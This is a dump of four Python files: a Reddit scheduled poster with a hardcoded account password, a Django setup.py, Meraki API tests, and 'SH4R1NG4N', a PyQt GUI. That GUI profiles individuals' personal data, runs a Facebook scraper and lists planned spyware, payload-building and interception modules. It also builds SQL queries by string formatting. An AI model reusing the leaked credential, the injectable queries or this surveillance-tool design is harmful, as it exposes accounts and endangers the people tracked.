+{"seq_id":"390714528","text":"def self_post():\n # submits self post to specified subreddit with post title and body\n # it will then return the short link for that post\n import praw\n user_agent = 'windows: timed poster: v.01 (by /u/evolvdone)'\n r = praw.Reddit(user_agent=user_agent)\n r.login('evolvdone', 'iAD^&rJjDe6q')\n link = r.submit(subreddit, post_title, text=post_body)\n return link\n\ndef db_loop():\n import sqlite3\n import datetime\n import time\n\n sqlite_file = 'app/reddit.db'\n db = sqlite3.connect(sqlite_file)\n c = db.cursor()\n loop = True\n\n while loop == True:\n # current_time = (datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M\"),)\n time.sleep(1) # slows things down a bit for no reason\n current_time = (\"2016-07-24 13:40\",)\n c.execute('SELECT id FROM reddit WHERE time_to_post=? AND posted=0 ',\n current_time)\n db_id = c.fetchall()\n\n for x in db_id:\n print(x)\n c.execute(\n 'SELECT post_title, post_body, subreddit FROM reddit WHERE id=?', x)\n post_data = c.fetchone()\n post_title = post_data[0]\n post_body = post_data[1]\n subreddit = post_data[2]\n submitted_link = self_post()\n print(submitted_link)\n c.execute('UPDATE reddit SET posted=1 WHERE id=?', x) # mark posted\n db.commit()\n\ndb_loop()\n\n\"\"\" What db_loop does:\nloop forever\n get current time\n irretarte though DB checking time column AND row not marked\n if time matches\n save ID #\n irretarte though saved ID #'s'\n post row via reddit_post function\n mark row as posted\n\"\"\"\n","sub_path":"db_loop.py","file_name":"db_loop.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"538092911","text":"import os\nfrom setuptools import find_packages, setup\nfrom yamdl import __version__\n\n\n# We use the README as the long_description\nreadme_path = os.path.join(os.path.dirname(__file__), \"README.rst\")\n\n\nsetup(\n name='yamdl',\n version=__version__,\n url='http://github.com/andrewgodwin/yamdl/',\n author='Andrew Godwin',\n author_email='andrew@aeracode.org',\n description='Flat-file model instances for Django',\n long_description=open(readme_path).read(),\n license='BSD',\n zip_safe=False,\n packages=find_packages(exclude=['tests']),\n include_package_data=True,\n install_requires=[\n 'Django>=1.11',\n 'pyyaml>=3.12',\n ],\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Environment :: Web Environment',\n 'Framework :: Django',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Topic :: Internet :: WWW/HTTP',\n ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"548831442","text":"# -*- coding: utf-8 -*-\n# Copyright 2019 Ross Jacobs All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Test generated python scripts.\n\nPylint disable (invalid-name) pylint doesn't like the fact that unittest uses\ncamel case. As this is an external library, ignore this check.\n\"\"\"\nimport unittest\nimport json\n\nimport generated.meraki_api as api\n\nwith open('../_apikey') as myfile:\n APIKEY = myfile.read()\nwith open('../_vars.json') as myfile:\n VARS = json.load(myfile)\napi.HEADERS['X-Cisco-Meraki-API-Key'] = APIKEY\n# pylint: disable=C0103\n\n\nclass TestApigenDashboard(unittest.TestCase):\n \"\"\"Test Meraki Apigen for Dashboard.\"\"\"\n def setUp(self):\n self.maxDiff = None\n\n def test_get_orgs(self):\n \"\"\"Get the organizations as a list.\"\"\"\n org_data = api.get_orgs()\n print(org_data)\n self.assertListEqual(org_data, VARS['ORG_DATA'])\n\n def test_get_networks(self):\n \"\"\"Get networks as a list.\"\"\"\n network_data = api.get_networks_by_org_id(VARS['ORG_ID'])\n print(\"Network Data:\", network_data)\n self.assertListEqual(VARS['NETWORK_DATA'], network_data)\n\n def test_create_delete_networks(self):\n \"\"\"Create and delete networks, testing expected output along the way\"\"\"\n local_network_data = VARS['NEW_NETWORK_DATA']\n local_new_network = api.create_network_by_org_id(\n VARS['ORG_ID'], VARS['NEW_NETWORK_PARAMS'])\n new_network_id = local_new_network['id']\n # Set ID of the last network to the correct one based on new network.\n local_network_data[-1]['id'] = new_network_id\n remote_all_networks = api.get_networks_by_org_id(VARS['ORG_ID'])\n remote_new_network = remote_all_networks[-1]\n self.assertListEqual(remote_all_networks, local_network_data)\n self.assertDictEqual(remote_new_network, local_new_network)\n\n code = api.delete_network_by_network_id(new_network_id)\n self.assertEqual(code, 204)\n\n def test_update_update_networks(self):\n \"\"\"Change network and change back and verify changes.\"\"\"\n expected_updated_network = VARS['UPDATED_NETWORK_JSON']\n remote_updated_network = api.update_network_by_network_id(\n VARS['NETWORK_ID'], params={\"tags\": \" west \"})\n self.assertDictEqual(expected_updated_network, remote_updated_network)\n remote_updated_network = api.update_network_by_network_id(\n VARS['NETWORK_ID'], params={\"tags\": \"\"})\n expected_updated_network['tags'] = \"\"\n self.assertDictEqual(expected_updated_network, remote_updated_network)\n\n def test_delete_networks(self):\n \"\"\"Test deletion of networks (doubles as a network deletion utility)\n\n network_id='' should return 404.\n An actual network_id should return 204\n \"\"\"\n network_id = 'N_'\n code = api.delete_network_by_network_id(network_id)\n self.assertEqual(204, code)\n if network_id == 'N_':\n self.assertEqual(404, code)\n else:\n self.assertEqual(204, code)\n\n\nclass TestApigenAdmins(unittest.TestCase):\n \"\"\"Test Meraki Apigen for Admins.\"\"\"\n def setUp(self):\n self.maxDiff = None\n\n def 
test_get_admins(self):\n \"\"\"Get a list of admins and compare to expected.\"\"\"\n actual_admin_data = api.get_admins_by_org_id(VARS['ORG_ID'])\n # lastActive changes all the time. Delete it from the fetched data.\n for index, _ in enumerate(actual_admin_data):\n actual_admin_data[index]['lastActive'] = \"\"\n print(\"Expected Data:\", VARS['ADMIN_DATA'])\n print(\"Admin Data:\", actual_admin_data)\n self.assertListEqual(VARS['ADMIN_DATA'], actual_admin_data)\n\n def test_create_delete_admin(self):\n \"\"\"Create a new admin and then delete them.\n Note this new admin is not a verified admin. Verify admin data before\n and after each API call.\n \"\"\"\n # Load dicts from store so we can change them.\n expected_new_admin = VARS['NEW_ADMIN']\n expected_new_admin_data = VARS['NEW_ADMIN_DATA']\n new_admin = api.create_admin_by_org_id(VARS['ORG_ID'],\n expected_new_admin)\n new_admin_data = api.get_admins_by_org_id(VARS['ORG_ID'])\n # New administrators get new IDs, so add the new ID to local admin dict\n expected_new_admin['id'] = new_admin['id']\n # lastActive changes all the time. Delete it from the fetched data.\n for index, _ in enumerate(new_admin_data):\n new_admin_data[index]['lastActive'] = \"\"\n # New admin was last added to admin list.\n expected_new_admin_data[-1] = expected_new_admin\n self.assertDictEqual(expected_new_admin, new_admin)\n self.assertListEqual(expected_new_admin_data, new_admin_data)\n\n code = api.delete_admin_by_admin_id(VARS['ORG_ID'],\n expected_new_admin['id'])\n self.assertEqual(code, 204) # 204 is expected DELETE success.\n new_admin_data = api.get_admins_by_org_id(VARS['ORG_ID'])\n # lastActive changes all the time. Delete it from the fetched data.\n for index, _ in enumerate(new_admin_data):\n new_admin_data[index]['lastActive'] = \"\"\n self.assertListEqual(new_admin_data, VARS['ADMIN_DATA'])\n\n def test_delete_admin(self):\n \"\"\"Test deletion of networks (doubles as a network deletion utility)\n\n admin_id=0 should return 404. Real admin_id should return 204\"\"\"\n admin_id = 0\n code = api.delete_admin_by_admin_id(VARS['ORG_ID'], admin_id)\n if admin_id == 0:\n self.assertEqual(404, code)\n else:\n self.assertEqual(204, code)\n\n def test_delete_extra_admin(self):\n \"\"\"If there's one more admin than expected, delete them.\"\"\"\n actual_admin_data = api.get_admins_by_org_id(VARS['ORG_ID'])\n # lastActive changes all the time. Delete it from the fetched data.\n for index, _ in enumerate(actual_admin_data):\n actual_admin_data[index]['lastActive'] = \"\"\n actual_ids = [admin['id'] for admin in actual_admin_data]\n expected_ids = [admin['id'] for admin in VARS['ADMIN_DATA']]\n if actual_ids != expected_ids:\n diff_admin_id = list(set(actual_ids).difference(\n set(expected_ids)))[0]\n diff_admin_email = [admin['email'] for admin in actual_admin_data\n if admin['id'] == diff_admin_id][0]\n print(\"Deleting admin...\\nemail:\", diff_admin_email,\n \"\\nID:\", diff_admin_id)\n code = api.delete_admin_by_admin_id(VARS['ORG_ID'], diff_admin_id)\n print(\"Return code is \", code)\n else:\n print(\"No excess admins detected!\")\n","sub_path":"tests/toy_scripts/python_toy_script.py","file_name":"python_toy_script.py","file_ext":"py","file_size_in_byte":7321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
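Several of the admin tests blank out the volatile lastActive field by hand before each comparison; a small helper would make that normalization reusable (a sketch, not part of the record):

```python
def normalize(records, volatile=("lastActive",)):
    """Return copies of the dicts with volatile fields blanked, so list
    comparisons ignore values that change between test runs."""
    cleaned = []
    for record in records:
        copy = dict(record)
        for field in volatile:
            if field in copy:
                copy[field] = ""
        cleaned.append(copy)
    return cleaned

# self.assertListEqual(normalize(actual_admin_data), normalize(VARS['ADMIN_DATA']))
```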
+{"seq_id":"643263555","text":"from SH4R1NG4N_UI import *\nfrom Dialog_ConnectDB import *\nfrom Dialog_Error import *\nfrom Dialog_ADDDB import *\nfrom Dialog_Notes import *\nfrom Dialog_Search import *\n\nfrom script_amaterasu import *\nfrom script_izanami import *\nfrom script_izanami import *\n\nimport threading\nimport itertools\nimport mysql.connector\nfrom mysql.connector import Error\n\nclass Database():\n\n\tlasts_commands = []\n\n\tdef __init__(self, command):\n\t\tglobal kill_switch\n\t\tself.command = command\n\t\tfiledb = open('configDB.txt', 'r')\n\t\tconfigDB = filedb.readline().split(';')\n\t\tfiledb.close()\n\t\ttry:\n\t\t\tself.con = mysql.connector.connect(user=configDB[0],password=configDB[1],host=configDB[2],database=configDB[3])\n\t\t\tself.cursor=self.con.cursor()\n\t\t\tprint(\"Connected to MySQL\")\n\t\t\tprint(\"Launching: \",command)\n\t\t\tkill_switch = 1\n\t\texcept Exception as err:\n\t\t\tkill_switch = 0\n\t\t\twindow.dialogError('[!] Error connecting to database: '+str(err))\n\n\n\tdef getName(self, command): # Shows the principal information on the interface by the clicked ID (person) in the table.\n\t\treturn self.run(command)\n\n\n\tdef showInfo(self, command, switch, id, window): # Shows all info of selected ID.\n\t\tif command == False: # The condition bring the opportunity of make two diferents alternatives.\n\t\t\ttable_rec = ['CELLPHONE', 'COMPUTER', 'NOTEBOOK', 'NETWORKS', 'RED'] \n\t\telse:\n\t\t\tself.cursor.execute(command)\n\t\t\ttable_rec = self.cursor.fetchall()\n\t\twindow.tableWidget.setRowCount(0)\n\t\tnull_values = 0\n\t\tfor table in table_rec:\n\t\t\tself.cursor.execute(\"DESC %s;\" % table)\n\t\t\trecords = self.cursor.fetchall()\n\t\t\tself.cursor.execute(\"SELECT * FROM %s WHERE \"%table + \"ID=%s;\"%id)\n\t\t\trecords2 = self.cursor.fetchall()\n\t\t\tA=0\n\t\t\tfor row, row2 in itertools.product(records, records2):\n\t\t\t\twindow.tableWidget.insertRow(A)\n\t\t\t\tif row2[A] == None: # Count the number of None tipe values, for percentage purposes.\n\t\t\t\t\tnull_values += 1 \n\t\t\t\tif switch == 'view':\n\t\t\t\t\twindow.tableWidget.setItem(A, 0, QtWidgets.QTableWidgetItem(str(row[0])))\n\t\t\t\t\twindow.tableWidget.setItem(A, 1, QtWidgets.QTableWidgetItem(str(row2[A])))\n\t\t\t\tA = A + 1\n\n\t\tempty = [' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ']\n\t\twindow.tableWidget.setHorizontalHeaderLabels(empty) # Reset the empty labels.\n\t\treturn (null_values*100)/205-100\n\n\t\t\n\tdef addData(self, command): # Adds data to Database.\n\t\ttry:\n\t\t\tself.cursor.execute(command)\n\t\t\tself.con.commit()\n\t\texcept Exception as err:\n\t\t\twindow.dialogError('Error: '+str(err))\n\tdef run(self, command): # Calls the main funciton of the Database.\n\t\tif kill_switch == 1: # It's important to maintain the caught of exceptions on the __init__ func.\n\t\t\ttry:\n\t\t\t\tself.cursor.execute(command)\n\t\t\t\tresult = self.cursor.fetchall()\n\t\t\t\twindow.tableWidget.setRowCount(0)\n\t\t\t\tfor row_number, row_data in enumerate(result):\n\t\t\t\t\twindow.tableWidget.insertRow(row_number)\n\t\t\t\t\tfor colum_number, data in enumerate(row_data):\n\t\t\t\t\t\twindow.tableWidget.setItem(row_number, colum_number, QtWidgets.QTableWidgetItem(str(data)))\n\n\t\t\t\tempty = [' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ']\n\t\t\t\twindow.tableWidget.setHorizontalHeaderLabels(empty) # Reset the empty labels.\n\t\t\t\twindow.tableWidget.setHorizontalHeaderLabels(self.cursor.column_names)\n\t\t\texcept Exception as 
err:\n\t\t\t\twindow.dialogError('Error: '+str(err))\n\t\t\ttry:\n\t\t\t\treturn window.tableWidget.item(0,0).text()\n\t\t\texcept:\n\t\t\t\tpass # Table is empty; nothing to return.\n\t\telse:\n\t\t\tpass\n\n\n\tdef __del__(self):\n\t\tself.cursor.close()\n\t\tself.con.close()\n\t\tprint('MySQL Connection closed.')\n\n\n# =====================================================================================================================================================\t#\n\nclass MainWindow(QtWidgets.QMainWindow, Ui_MainWindow):\n\tindex = 0\n\tdef __init__(self, *args, **kwargs):\n\t\tQtWidgets.QMainWindow.__init__(self, *args, **kwargs)\n\t\tself.setupUi(self)\n\t\tself.buttonLOAD.clicked.connect(self.dialogDB)\n\t\tself.buttonAMATERASU.clicked.connect(self.selectAMATERASU)\n\t\tself.buttonIZANAMI.clicked.connect(self.selectIZANAMI)\n\t\tself.buttonIZANAGI.clicked.connect(self.selectIZANAGI)\n\t\tself.buttonKAMUI.setEnabled(False)\n\t\tself.buttonKOTOAMATSUKAMI.setEnabled(False)\n\t\tself.buttonSUSANOO.setEnabled(False)\n\t\tself.buttonTSUKUYOMI.setEnabled(False)\n\t\tself.buttonQuery.clicked.connect(self.sendQuery)\n\t\tself.tableWidget.clicked.connect(self.viewData)\n\t\tself.buttonLOADSCRIPT.clicked.connect(self.loadScript)\n\t\tself.buttonSH1.clicked.connect(self.dialogNotes)\n\t\tself.buttonSH2.clicked.connect(self.showCustom)\n\t\tself.buttonSH3.clicked.connect(self.showAllTables)\n\t\tself.buttonADD.clicked.connect(self.addDB)\n\t\tself.buttonREFRESH.clicked.connect(self.refreshThread)\n\t\tself.verticalSlider_DATAFRAME.valueChanged.connect(self.slideFrames)\n\t\tself.buttonNEXT.clicked.connect(self.search)\n\t\tself.selectIZANAMI()\n\t\tself.refreshThread()\n\n\tdef search(self, results, href):\n\t\tSearcher = QtWidgets.QDialog()\n\t\tSearcher_UI = Ui_SEARCHBOX()\n\t\tSearcher_UI.setupUi(Searcher, results, href)\n\t\tSearcher.show()\n\t\tSearcher.exec_()\n\n\tdef refreshThread(self): # Shows the data of the frames at startup if the DB is set up and connected.\n\t\tself.buttonREFRESH.setEnabled(False)\n\t\tself.threads = []\n\t\ttry:\n\t\t\tfor i in range(1,11):\n\t\t\t\texec(\"hilo_{} = threading.Thread(name='hilo_frames_{}', target=self.refreshFrames, args=[{}])\".format(i,i,i)) # Calls refreshFrames.\n\t\t\t\texec(\"hilo_{}.start()\".format(i))\n\t\t\t\texec(\"self.threads.append(hilo_{})\".format(i))\n\t\texcept Exception as err:\n\t\t\tprint(err)\n\t\tfinally:\n\t\t\tfor thread in self.threads:\n\t\t\t\tthread.join()\n\t\t\tself.buttonREFRESH.setEnabled(True)\n\n\n\n\tdef refreshFrames(self, val): # Refreshes the data quantity in % shown on the frames.\n\t\tcommand = 'SHOW TABLES;'\n\t\tcall_db = Database(command)\n\t\tpercentage = call_db.showInfo(command, 'percentage', val, self)\n\t\tif percentage != -100.0:\n\t\t\taux = percentage/100\n\t\t\tresult = 0\n\t\t\tfor time in range(100): # Soft refresh; purely a visual effect to make the app look nicer.\n\t\t\t\tresult = result + aux\n\t\t\t\tsleep(0.008)\n\t\t\t\texec('self.progressDB_{}.setValue(abs(result))'.format(val))\n\t\telse:\n\t\t\tpass\n\n\n\tdef slideFrames(self): # Coordinates the slider with the label to show the group of frames.\n\t\tsize = self.verticalSlider_DATAFRAME.value()\n\t\tif size < 92 and size > 0:\n\t\t\tself.labelDATAFRAME.setText(str(size)+' - '+str(size+9))\n\n\t\t\n\tdef addDB(self): # Open a dialog to manually add entries to the Database.\n\t\tself.AddDbDialog = QtWidgets.QDialog()\n\t\tself.add_dialog_db = Ui_ADDDB()\n\t\tself.add_dialog_db.setupUi(self.AddDbDialog, 
self)\n\t\tself.AddDbDialog.show()\n\t\tself.AddDbDialog.exec_()\n\n\tdef dialogDB(self): # Open the dialog of database configurations.\n\t\tself.DialogDBLoad = QtWidgets.QDialog()\n\t\tself.ui_dialog_db = Ui_Dialog()\n\t\tself.ui_dialog_db.setupUi(self.DialogDBLoad, self)\n\t\tself.DialogDBLoad.show()\n\t\tself.DialogDBLoad.exec_()\n\n\tdef dialogNotes(self): # Open a dialog with the notes of the selected ID.\n\t\tif self.lineFBID.text() != 'None':\n\t\t\tself.DialogNotes = QtWidgets.QDialog()\n\t\t\tself.ui_dialog_notes = Ui_DialogNotes()\n\t\t\tself.ui_dialog_notes.setupUi(self.DialogNotes, self)\n\t\t\tself.DialogNotes.show()\n\t\t\tself.DialogNotes.exec_()\n\t\telse:\n\t\t\tself.dialogError('Invalid FBID')\n\n\tdef dialogError(self, errorinfo): # Shows an error dialog.\n\t\terror = QtWidgets.QDialog()\n\t\terror_dialog = Ui_ErrorDialog()\n\t\terror_dialog.setupUi(error, errorinfo)\n\t\terror.show()\n\t\terror.exec_()\n\n\n\tdef addEntry(self, saved_labels, saved_texts, saved_data, group_names): # Manually adds data to the Database.\n\t\tcontador = 0\n\t\tfor group_num, texts in enumerate(saved_texts):\n\t\t\tfor texts_num, text in enumerate(texts):\n\t\t\t\tif contador == 0:\n\t\t\t\t\tcatch_ID = text.toPlainText()\n\t\t\t\tprint(str(contador),': ',text)\n\t\t\t\tif saved_data[contador] == 'ID':\n\t\t\t\t\tif text.toPlainText() != '':\n\t\t\t\t\t\tcommand = \"INSERT INTO {} ({}) VALUES ({});\".format(group_names[group_num], saved_data[contador], text.toPlainText())\n\t\t\t\t\t\tself.call_db = Database(command)\n\t\t\t\t\t\tself.call_db.addData(command)\n\t\t\t\t\telse:\n\t\t\t\t\t\tcommand = \"INSERT INTO {} ({}) VALUES ({});\".format(group_names[group_num], saved_data[contador], catch_ID)\n\t\t\t\t\t\tself.call_db = Database(command)\n\t\t\t\t\t\tself.call_db.addData(command)\n\n\t\t\t\telse:\n\t\t\t\t\tif text.toPlainText() != '':\n\t\t\t\t\t\tcommand = \"UPDATE {} SET {} = {} WHERE ID = {};\".format(group_names[group_num], saved_data[contador], str(text.toPlainText()), catch_ID)\n\t\t\t\t\t\tself.call_db = Database(command)\n\t\t\t\t\t\tself.call_db.addData(command)\n\t\t\t\tcontador += 1\n\n\n\tdef connectDB(self, dialog, one, two, three, four): # Tries to connect to the DB; on success turns the light on and calls \"SHOW TABLES;\".\n\t\tfiledb = open('configDB.txt', 'w')\n\t\tfiledb.write(one+';'+two+';'+three+';'+four)\n\t\tfiledb.close()\n\t\tfiledb = open('configDB.txt', 'r')\n\t\tconfigDB = filedb.readline().split(';')\n\t\tfiledb.close()\n\t\ttry:\n\t\t\tmysql.connector.connect(user=configDB[0],password=configDB[1],host=configDB[2],database=configDB[3])\n\t\t\tdialog.buttonHELP.setIcon(dialog.icon2)\n\t\t\tself.refreshThread()\n\t\t\t\n\t\texcept Exception as err:\n\t\t\tMainWindow.dialogError(MainWindow, str(err))\n\t\tfinally:\n\t\t\tself.textDB.setPlainText('SHOW TABLES;')\n\t\t\tself.sendQuery('normal')\n\t\t\n\n\tdef sendQuery(self, type_q): # Send queries to the database.\n\t\tcommand = self.textDB.toPlainText()\n\t\tself.call_db = Database(command)\n\t\tself.call_db.run(command)\n\t\tif type_q != 'view':\n\t\t\tDatabase.lasts_commands.insert(0,command)\n\n\n\tdef loadScript(self): # Load the selected script.\n\t\tif self.groupBox.title() == 'SELECTED: script_amaterasu.py':\n\t\t\ttry:\n\t\t\t\thilo0 = threading.Thread(name='hilo_amaterasu',target=amaterasu, args=(self.textScript1.toPlainText(),self.textScript2.toPlainText(),self.textScript3.toPlainText(),self.textScript4.toPlainText()))\n\t\t\t\thilo0.start()\n\t\t\texcept Exception as err:\n\t\t\t\tself.dialogError('[!] 
Soup closed: '+str(err))\n\n\t\telif self.groupBox.title() == 'SELECTED: script_izanami.py':\n\t\t\ttry:\n\t\t\t\t#hilo1 = threading.Thread(name='hilo_izanami',target=izanami, args=(self.textScript1.toPlainText(),self.textScript2.toPlainText(),self.textScript3.toPlainText(),self.textScript4.toPlainText()+'.html', self))\n\t\t\t\t#hilo1.start()\n\t\t\t\tizanami(self.textScript1.toPlainText(),self.textScript2.toPlainText(),self.textScript3.toPlainText(),self.textScript4.toPlainText()+'.html', self)\n\t\t\texcept Exception as err:\n\t\t\t\tself.dialogError('[!] Driver closed: '+str(err))\n\t\t\t\tprint(err)\n\n\t\telif self.groupBox.title() == 'SELECTED: script_izanagi.py':\n\t\t\tprint('izanagi')\n\n\t\telif self.groupBox.title() == 'SELECTED: script_kamui.py':\n\t\t\tprint('kamui')\n\n\t\telif self.groupBox.title() == 'SELECTED: script_kotoamatsukami.py':\n\t\t\tprint('kotoamatsukami')\n\n\t\telif self.groupBox.title() == 'SELECTED: script_susanoo.py':\n\t\t\tprint('susanoo')\n\t\t\n\t\telif self.groupBox.title() == 'SELECTED: script_tsukuyomi.py':\n\t\t\tprint('tsukuyomi')\n\n\n\tdef viewData(self): # Shows in the interface the information of a selected ID (person) when you click on the table.\n\t\trow = self.tableWidget.currentRow()\n\t\ttry:\n\t\t\tgetid = self.tableWidget.item(row,0).text()\n\t\t\tself.lcdd.display(int(getid))\n\t\t\tself.lineName.setText(str(Database(('SELECT NAME FROM GENERAL WHERE ID={};'.format(int(getid)))).getName('SELECT NAME FROM GENERAL WHERE ID={};'.format(int(getid))))+' '+\n\t\t\t\t\t\t\t\tstr(Database(('SELECT LASTNAME FROM GENERAL WHERE ID={};'.format(int(getid)))).getName('SELECT LASTNAME FROM GENERAL WHERE ID={};'.format(int(getid)))))\n\t\t\tself.lineDNI.setText(str(Database(('SELECT DNI FROM GENERAL WHERE ID={};'.format(int(getid)))).getName('SELECT DNI FROM GENERAL WHERE ID={};'.format(int(getid)))))\n\t\t\tself.lineBirthdate.setText(str(Database(('SELECT BORN_DATE FROM GENERAL WHERE ID={};'.format(int(getid)))).getName('SELECT BORN_DATE FROM GENERAL WHERE ID={};'.format(int(getid)))))\n\t\t\tself.lineCountry.setText(str(Database(('SELECT NATIONALITY FROM GENERAL WHERE ID={};'.format(int(getid)))).getName('SELECT NATIONALITY FROM GENERAL WHERE ID={};'.format(int(getid)))))\n\t\t\tself.lineFBID.setText(str(Database(('SELECT FaceID FROM GENERAL WHERE ID={};'.format(int(getid)))).getName('SELECT FaceID FROM GENERAL WHERE ID={};'.format(int(getid)))))\n\t\t\t\n\t\t\tid_number = window.lcdd.value()\n\t\t\tcommand = 'SHOW TABLES;'\n\t\t\tcall_db = Database(command)\n\t\t\tpercent = call_db.showInfo(command, 'view', id_number, self)\n\t\t\tprint(abs(percent),' %')\n\t\t\tself.progressBar.setValue(abs(percent))\n\n\t\t\tcommand = self.textDB.toPlainText()\n\t\t\tcall_db = Database(command)\n\t\t\tcall_db.run(command)\n\t\texcept:\n\t\t\tpass\n\n\n\tdef showAllTables(self): # Shows all info of selected ID.\n\t\tid_number = window.lcdd.value()\n\t\tcommand = 'SHOW TABLES;'\n\t\tcall_db = Database(command)\n\t\tpercentage = call_db.showInfo(command, 'view', id_number, self)\n\t\tprint(abs(percentage),' %')\n\t\tself.progressBar.setValue(abs(percentage))\n\n\n\tdef showCustom(self): # Shows all info of selected ID.\n\t\tid_number = window.lcdd.value()\n\t\tcommand = False\n\t\tcall_db = Database(command)\n\t\tcall_db.showInfo(command, 'view', id_number, self)\n\n\n\tdef keyPressEvent(self, event):\n\t\tif event.key() == Qt.Key_Q and event.modifiers() & Qt.ControlModifier:\n\t\t\tself.viewBack()\n\n\t\telif event.key() == Qt.Key_W and event.modifiers() & 
Qt.ControlModifier:\n\t\t\tself.viewNext()\n\n\n\tdef viewBack(self): # Load the previous command. (CTRL+Q)\n\t\tprint('Left pressed')\n\t\tif len(Database.lasts_commands) >= 2 and MainWindow.index < len(Database.lasts_commands)-1:\n\t\t\tMainWindow.index += 1\n\t\t\tprint(str(MainWindow.index))\n\t\t\tself.textDB.setPlainText(Database.lasts_commands[MainWindow.index])\n\t\t\tself.sendQuery('view')\n\n\n\tdef viewNext(self): # Load the next command. (CTRL+W)\n\t\tprint('Right pressed')\n\t\tif len(Database.lasts_commands) >= 2 and MainWindow.index > 0:\n\t\t\tMainWindow.index -= 1\n\t\t\tprint(str(MainWindow.index))\n\t\t\tself.textDB.setPlainText(Database.lasts_commands[MainWindow.index])\n\t\t\tself.sendQuery('view')\n\n\tdef selectAMATERASU(self): # Shows the available settings and prepares the scripts when you click on the icons.\n\t\tself.labelConfig1.setText('URL')\n\t\tself.labelConfig2.setText('Find')\n\t\tself.labelConfig3.setText('Save')\n\t\tself.labelConfig4.setText('Route')\n\t\tself.groupBox.setTitle('SELECTED: script_amaterasu.py')\n\t\tself.buttonLOADSCRIPT.setEnabled(True)\n\tdef selectIZANAMI(self):\n\t\tself.labelConfig1.setText('FB Username')\n\t\tself.labelConfig2.setText('FB Password')\n\t\t# self.textScript2.setEchoMode(QtGui.QLineEdit.Password) WOULD NEED textScript2 TO BE A QLineEdit\n\t\tself.labelConfig3.setText('FB Target ID')\n\t\tself.labelConfig4.setText('Output file')\n\t\tself.groupBox.setTitle('SELECTED: script_izanami.py')\n\t\tself.buttonLOADSCRIPT.setEnabled(True)\n\tdef selectIZANAGI(self):\n\t\tself.labelConfig1.setText('FB ID')\n\t\tself.labelConfig2.setText('Data Processing(V/F)')\n\t\tself.labelConfig3.setText('Who React(V/F)')\n\t\tself.labelConfig4.setText('IMG Downloading(V/F)')\n\t\tself.groupBox.setTitle('SELECTED: script_izanagi.py')\n\t\tself.buttonLOADSCRIPT.setEnabled(True)\n\tdef selectKAMUI(self):\n\t\tself.labelConfig1.setText('EMAIL')\n\t\tself.labelConfig2.setText('KB to KILL')\n\t\tself.labelConfig3.setText('Capture Webcam (V/F)')\n\t\tself.labelConfig4.setText('Screenshot (V/F)')\n\t\tself.groupBox.setTitle('SELECTED: script_kamui.py')\n\t\tself.buttonLOADSCRIPT.setEnabled(False)\n\tdef selectKOTOAMATSUKAMI(self):\n\t\tself.labelConfig1.setText('File to Venom')\n\t\tself.labelConfig2.setText('False files (V/F)')\n\t\tself.labelConfig3.setText('Encoders (0,1)')\n\t\tself.labelConfig4.setText('To Rar (V/F)')\n\t\tself.groupBox.setTitle('SELECTED: script_kotoamatsukami.py')\n\t\tself.buttonLOADSCRIPT.setEnabled(False)\n\tdef selectSUSANOO(self):\n\t\tself.labelConfig1.setText('IP Target')\n\t\tself.labelConfig2.setText('IP Gateway')\n\t\tself.labelConfig3.setText('Interface')\n\t\tself.labelConfig4.setText('IP/Port Proxy')\n\t\tself.groupBox.setTitle('SELECTED: script_susanoo.py')\n\t\tself.buttonLOADSCRIPT.setEnabled(False)\n\tdef selectTSUKUYOMI(self):\n\t\tself.labelConfig1.setText('USER/PASS')\n\t\tself.labelConfig2.setText('FB MAIN ID')\n\t\tself.labelConfig3.setText('Tree Analysis(1,2,3)')\n\t\tself.labelConfig4.setText('Sleep Time (00:00)')\n\t\tself.groupBox.setTitle('SELECTED: script_tsukuyomi.py')\n\t\tself.buttonLOADSCRIPT.setEnabled(False)\n\nif __name__ == \"__main__\":\n\tapp = QtWidgets.QApplication([])\n\twindow = MainWindow()\n\twindow.show()\n\tapp.exec_()","sub_path":"SH4R1NG4N.py","file_name":"SH4R1NG4N.py","file_ext":"py","file_size_in_byte":16071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
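refreshThread above joins its worker threads on the GUI thread, so the window freezes until every frame query finishes. One way to keep the event loop responsive is Qt's own thread pool (a sketch assuming PyQt5, not the record's exact wiring; results should travel back to the GUI thread via signals, never by touching widgets directly):

```python
from PyQt5.QtCore import QRunnable, QThreadPool

class FrameRefresher(QRunnable):
    def __init__(self, frame_index, work):
        super().__init__()
        self.frame_index = frame_index
        self.work = work  # callable doing the slow DB query

    def run(self):
        # Runs on a pool thread; never touch widgets from here --
        # emit a signal carrying the result back to the GUI thread instead.
        self.work(self.frame_index)

def refresh_all(work):
    pool = QThreadPool.globalInstance()
    for i in range(1, 11):
        pool.start(FrameRefresher(i, work))  # returns immediately; no join()
```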
